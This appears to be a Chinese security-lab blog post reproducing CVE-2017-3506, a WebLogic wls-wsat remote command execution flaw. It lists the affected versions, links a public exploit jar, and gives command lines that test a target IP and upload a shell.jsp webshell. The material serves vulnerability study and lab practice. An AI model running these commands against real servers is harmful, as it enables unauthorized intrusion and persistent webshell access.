CVE-2017-3506
漏洞描述:wls-wsat组件远程命令执行
影响范围:
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0
EXP:https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2017-3506_webshell.jar
复现
- java -jar cve-2017-3506_webshell.jar
![图片[1]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd090730-1024x443.png)
- java -jar cve-2017-3506_webshell.jar -u http://123.58.224.8:52925/
![图片[2]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd090806-1024x128.png)
- java -jar cve-2017-3506_webshell.jar -s http://123.58.224.8:52925 /wls-wsat/CoordinatorPortType11 shell.jsp
![图片[3]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd090843-1024x75.png)
![图片[4]-【初级】weblogic wls-wsat组件远程命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd090852-1024x406.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容